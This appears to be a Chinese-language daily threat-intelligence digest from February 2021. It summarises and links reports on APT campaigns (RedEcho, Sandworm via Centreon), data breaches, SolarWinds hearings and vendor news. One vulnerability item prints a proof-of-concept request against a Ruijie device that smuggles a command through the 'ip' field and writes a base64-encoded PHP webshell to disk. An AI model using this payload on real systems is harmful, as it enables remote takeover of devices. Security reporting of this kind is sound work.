今日威胁情报2021/2/27-28(第353期)

  • A+
所属分类:安全新闻

今日威胁情报2021/2/27-28(第353期)


高级威胁分析
今日威胁情报2021/2/27-28(第353期)


1、China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions

今日威胁情报2021/2/27-28(第353期)

今日威胁情报2021/2/27-28(第353期)

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://go.recordedfuture.com/redecho-insikt-group-report


2、法国安全机构ANSSI在2020年12月发起了一场类似于SolarWinds事件的攻击。攻击者通过带有Centreon平台的服务器来监视组织的网络,该服务器用于监视IT基础架构。受损的组织尤其包括Web托管服务提供商。这条路通向俄罗斯APT乐队Sandworm。

    法国国家信息系统安全局(ANSSI)报告了对一项为期数年的运动的调查,其中攻击者以未知的方式安装了Centreon监视工具,从而使服务器渗透到服务器中。ANSSI根据所使用的C&C基础设施,将此战役与俄罗斯军事APT团体Sandworm(也称为Voodoo Bear或BlackEnergy)联系起来。该机构透露入侵了几家法国公司的系统,尤其是Web托管提供商,这些事件发生在2017年至2020年之间。

    在暴露于Internet的受到威胁的Centreon服务器上,攻击者创建了两种类型的后门。一种是PAS Webshell版本3.1.4,另一种是RAT Exaramel。攻击者因此获得了对其所参与的受感染系统和网络的控制。他们可以下载,上传和编辑文件,搜索文件系统,远程执行命令,与SQL数据库进行交互以及发起暴力密码攻击。与C&C基础结构的通信是通过HTTPS协议进行的。

在发现的受感染服务器上,Centreon的最新版本为2.5.2。

https://www.csirt.gov.sk/oznamenia-a-varovania-803.html?id=402


技术分享
今日威胁情报2021/2/27-28(第353期)


1、2020年托管安全服务趋势报告

https://www.cybersecurity-insiders.com/portfolio/2020-managed-security-services-trends-report/


2、The CNAME of the Game: Large-scale Analysis of DNS-based Tracking Evasion。基于DNS的跟踪逃逸的大规模分析

https://arxiv.org/abs/2102.09301


3、OSINT

https://sector035.nl/articles/2021-08


4、Go语言在高级威胁中逐渐成为常用脚本

https://www.intezer.com/resource/year-of-the-gopher-2020-go-malware-round-up/


数据泄露
今日威胁情报2021/2/27-28(第353期)


1、美国电信提供商T-Mobile已披露了数据泄露事件,原因是未知数量的客户显然受到SIM交换攻击的影响

https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/


2、DDoSecrets公开了属于已注册Gab用户的70 GB的敏感数据,Gab是一个右翼社交网络平台,声称提供“言论自由”,没有任何审查制度。其中包括白人至上主义者,新纳粹主义者,白人民族主义者,另类右翼人士和QAnon阴谋理论家。(具体地址自己找吧)

https://www.hackread.com/gab-hacked-ddosecrets-leak-profiles-posts-dms-passwords-online/


3、SuperVPN,GeckoVPN和ChatVPN 用户数据泄露,涉及2100万条用户记录

https://cybernews.com/security/one-of-the-biggest-android-vpns-hacked-data-of-21-million-users-from-3-android-vpns-put-for-sale-online/


漏洞相关
今日威胁情报2021/2/27-28(第353期)


1、锐捷某设备型号RCE

PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K” | base64 -d POC:POST /guest_auth/guestIsUp.php ip = 127.0.0.1 | echo“ PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K” | base64 -d> poc.php / mac = est = 00

今日威胁情报2021/2/27-28(第353期)


2、

今日威胁情报2021/2/27-28(第353期)

https://ssd-disclosure.com/nxp-mifare-integrated-chips/


网络战与网络情报
今日威胁情报2021/2/27-28(第353期)


1、上周周五举行的关于SolarWinds的监督与改革和国土安全内务委员会的听证会上,关于SolarWinds密码泄露的锅甩给了实习生……

https://homeland.house.gov/weathering-the-storm-the-role-of-private-tech-in-the-solarwinds-breach-and-the-ongoing-campaign

https://thehackernews.com/2021/03/solarwinds-blame-intern-for-weak.html


2、NSA 采用零信任模型

今日威胁情报2021/2/27-28(第353期)

https://us-cert.cisa.gov/ncas/current-activity/2021/02/26/nsa-releases-guidance-zero-trust-security-model


3、厄瓜多尔最大的私人银行Banco Pichincha和该国财政部被黑客入侵

今日威胁情报2021/2/27-28(第353期)

https://twitter.com/SecurChronicle/status/1364266545459851266/photo/1


安全厂商动态
今日威胁情报2021/2/27-28(第353期)


1、crowdstrike 新功能。研究对手。

https://adversary.crowdstrike.com/



今日威胁情报2021/2/27-28(第353期)

今日威胁情报2021/2/27-28(第353期)

本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/2/27-28(第353期)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: